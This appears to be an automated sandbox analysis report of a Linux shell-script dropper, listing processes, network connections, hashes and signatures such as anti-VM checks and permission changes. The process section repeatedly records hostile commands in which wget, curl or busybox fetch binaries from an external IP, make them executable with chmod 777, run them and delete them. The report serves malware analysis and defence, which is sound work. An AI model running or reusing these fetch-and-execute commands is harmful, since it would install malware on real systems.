/usr/bin/wget

[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/chmod

[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda

[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/rm

[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 151.101.193.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 195.181.164.14:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 01:07

Reported

2024-11-10 01:10

Platform

debian9-armhf-20240611-en

Max time kernel

30s

Max time network

57s

Command Line

[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR N/A
N/A /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b N/A
N/A /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy N/A
N/A /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X N/A
N/A /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w N/A
N/A /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda N/A
N/A /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs N/A
N/A /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM N/A
N/A /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C N/A
N/A /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp N/A
N/A /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK N/A
N/A /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE N/A
N/A /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe N/A
N/A /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw N/A
N/A /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM N/A
N/A /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C N/A
N/A /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs N/A
N/A /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /usr/bin/curl N/A
File opened for modification /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /usr/bin/curl N/A
File opened for modification /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /usr/bin/curl N/A
File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /usr/bin/curl N/A
File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /usr/bin/curl N/A
File opened for modification /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /usr/bin/curl N/A
File opened for modification /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /usr/bin/curl N/A
File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /usr/bin/curl N/A
File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /usr/bin/curl N/A
File opened for modification /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /usr/bin/curl N/A
File opened for modification /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /usr/bin/curl N/A
File opened for modification /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /usr/bin/curl N/A
File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /usr/bin/curl N/A
File opened for modification /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /usr/bin/curl N/A
File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /usr/bin/curl N/A
File opened for modification /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /usr/bin/curl N/A
File opened for modification /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /usr/bin/curl N/A
File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /usr/bin/curl N/A

Processes

/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh

[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/chmod

[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/rm

[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/wget

[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/chmod

[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b

[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/rm

[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/wget

[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/chmod

[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy

[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/rm

[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/wget

[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/chmod

[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X

[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/rm

[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/wget

[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/chmod

[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w

[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/rm

[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/wget

[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/chmod

[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda

[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/rm

[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/wget

[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/chmod

[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs

[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/rm

[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/wget

[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/chmod

[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM

[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/rm

[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/wget

[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/chmod

[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C

[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/rm

[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/wget

[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/chmod

[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp

[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/rm

[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/wget

[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/chmod

[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK

[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/rm

[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/wget

[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/chmod

[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE

[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/rm

[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/wget

[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/chmod

[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe

[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/rm

[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/wget

[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/chmod

[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw

[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/rm

[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/chmod

[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM

[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/rm

[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/wget

[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/chmod

[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C

[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/rm

[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/wget

[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/chmod

[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs

[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/rm

[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/wget

[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/chmod

[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE

[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/rm

[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/wget

[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
